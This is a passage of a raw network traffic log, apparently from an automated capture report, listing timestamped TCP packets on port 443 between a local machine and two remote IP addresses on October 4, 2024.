                                          Oct 4, 2024 06:22:04.428985119 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.429052114 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.429064035 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.429117918 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.429188967 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.429200888 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.432607889 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.432696104 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.432709932 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.436906099 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.436990976 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.437052011 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.437088013 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.437163115 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.437179089 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.437221050 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.437283039 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.437294960 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.437335014 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.437402010 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.437414885 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.452127934 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.452284098 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.452358007 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.452358007 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.452425957 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.452488899 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.500607967 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.500827074 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.513890982 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514113903 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514122009 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514183998 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514261007 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514275074 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514276028 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514300108 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514332056 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514370918 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514394045 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514535904 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514610052 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514610052 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514652014 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514683008 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514738083 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514815092 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514878988 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.514908075 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.514950037 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515012980 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.515031099 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515065908 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515132904 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.515145063 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515185118 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515250921 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.515263081 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515310049 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515372038 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.515400887 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515470028 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515532017 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.515544891 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515578985 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.515638113 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.515650034 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.538481951 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.538609982 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.538697958 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.538697958 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.538767099 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.538825035 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.586853027 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.586990118 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.599961042 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600164890 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.600188971 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600236893 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600264072 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600296974 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.600313902 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.600321054 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600337029 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.600367069 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.600392103 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600605965 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.600613117 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600670099 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600694895 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600819111 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600894928 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.600894928 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.600928068 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.600960970 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601028919 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.601038933 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601098061 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601155043 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.601161957 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601217031 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601289988 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.601296902 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601349115 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601406097 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.601425886 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601497889 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601560116 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.601567030 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601634026 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601686954 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.601692915 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601824045 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.601881981 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.601887941 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.625082970 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.625175953 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.625220060 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.625253916 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.625310898 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.625310898 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.672959089 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.673285007 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.685976982 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.686105013 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.686199903 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.686199903 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.686264038 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.686501980 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.686584949 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.686705112 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.686711073 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.686711073 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.686784983 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.686841011 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.686841011 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.687035084 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687108994 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687258005 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687256098 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.687256098 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.687320948 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687370062 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.687371016 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687431097 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.687447071 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687653065 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687711000 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.687726021 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687844992 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687895060 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.687901974 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.687998056 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.688045979 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.688052893 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.711066008 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.711141109 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.711558104 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.711590052 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.711791992 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.742038012 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.742038012 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.759284973 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.759520054 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.772108078 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.772234917 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.772372007 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.772372007 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.772433996 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.772716999 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.772795916 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.772866011 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.772891045 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.772891998 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.772918940 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.772938013 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.772945881 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.772983074 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.773124933 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773188114 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.773219109 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773338079 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773397923 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.773412943 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773437023 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773490906 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.773504972 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773802996 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773863077 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.773866892 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773880005 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.773921013 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.774100065 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.774162054 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.778996944 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.779239893 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.796983004 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.797183990 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.797363043 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.797532082 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.845629930 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.845851898 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.858619928 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.858803988 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.858876944 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.858876944 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.858942032 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.858979940 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859000921 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859016895 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859060049 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859078884 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859144926 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859287024 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859359026 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859359980 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859426022 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859462023 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859492064 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859508038 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859534979 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859554052 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859613895 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859685898 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859720945 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859791994 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.859858990 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.859920025 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.860007048 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.860078096 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.860131979 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.860188961 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.860351086 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.860420942 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.860456944 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.860591888 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.860646009 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.908946991 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:06.512167931 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:06.512213945 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:06.512423038 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:06.514861107 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:06.514883041 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.148127079 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.148216963 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:07.152107000 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:07.152120113 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.152515888 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.202764034 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:07.322905064 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:07.363418102 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.495100021 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.500565052 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:07.500580072 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.724886894 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.724986076 CEST44349731149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:07.725034952 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:07.725543022 CEST49731443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:16.366358042 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:16.366458893 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:16.366544962 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:16.370229006 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:16.370265007 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:16.888164997 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:16.888266087 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:16.892364979 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:16.892395973 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:16.892812967 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:16.937083960 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:16.949095964 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:16.995403051 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.074704885 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.074764013 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.074785948 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.074826002 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.074855089 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.074881077 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.099200010 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.099276066 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.099292040 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.140495062 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.158777952 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.158806086 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.159213066 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.159267902 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.159307957 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.159333944 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.159487963 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.159488916 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.160259008 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.160281897 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.160382032 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.186372995 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.186490059 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.251825094 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.251991034 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.252367973 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.252454996 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.253407955 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.253484011 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.253503084 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.253571987 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.254645109 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.254729033 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.256422997 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.256505013 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.258171082 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.258353949 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.281407118 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.281516075 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.339667082 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.339767933 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.340338945 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.340415001 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.341169119 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.341264009 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.342097044 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.342163086 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.343080044 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.343151093 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.344063044 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.344145060 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.344856024 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.344928026 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.345947027 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.346018076 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.346060991 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.346146107 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.347430944 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.347518921 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.348736048 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.348818064 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.377533913 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.377618074 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.379018068 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.379103899 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.426908016 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.426999092 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.427562952 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.427659035 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.427692890 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.427762032 CEST49732443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:17.428453922 CEST4434973267.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:17.428530931 CEST49732443192.168.2.467.212.175.162
